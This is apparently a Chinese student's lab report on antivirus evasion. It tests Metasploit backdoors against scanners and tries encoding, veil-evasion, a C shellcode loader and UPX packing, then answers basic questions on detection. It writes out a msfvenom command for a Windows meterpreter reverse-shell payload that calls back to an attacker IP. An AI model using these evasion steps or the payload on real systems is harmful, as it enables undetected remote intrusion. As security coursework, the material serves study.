Exp3 免杀原理与实践
使用msf生成后门程序的检测
-
将上周msf生成的后门文件放在virscan.org中进行扫描
-
结果很危险
-
使用msf编码一次进行扫描
-
使用msf编码10次进行扫描
-
结果同样很危险,所以单纯改变编码次数并不能免杀。
使用veil-evasion生成
-
下载安装完成veil-evasion
-
设置生成免杀文件
-
生成成功
-
开启监听
-
回连成功
-
av测试警告,只剩5个了很不错
使用shellcode编写程序
-
这个步骤我做了好多次,因为虚拟机ip总在变化,变化一次就要重新生成一次shellcode数组,所以以下截图中ip不同常在。
-
首先执行命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=443 -f c 生成shellcode数组。
-
根据这个shellcode数组写出c程序,然后编译c程序生成可在64位windows执行的程序。
-
将这个可执行的程序拷到windows中。然后在win中运行,kali中监听。但是不好使。
-
只能在win中下载vs,然后用vs编译生成那个shellcode程序。
-
生成好了文件,在kali下设置监听
-
运行文件,获得回连
-
av查杀警告5个,也不错
-
特意看了一下360,没有用hahaha
给shellcode加壳
-
使用upx命令加壳
-
将加壳程序拷到win中,然后跟之前一样,监听,运行加壳程序。回连成功。
-
av查杀警告7个,这壳白加了,要是想用它搞事情就不能用这个了。
-
但是看了一下360,还是没查出来。
-
由于都是用虚拟机做的,之前的win上没有安装杀毒软件,然后安装杀毒软件,重新做了次回连。
-
又用360扫描了一下,只有之前没做免杀的后门被扫了出来
基础问题回答
-
杀软是如何检测出恶意代码的?
-
基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测;网上答案跟老师讲的差不多
-
免杀是做什么?
-
不让杀毒软件查出来。
-
免杀的基本方法有哪些?
-
改变特征码、改变行为;参考免杀百度百科“免杀”(跟老师讲的差不多)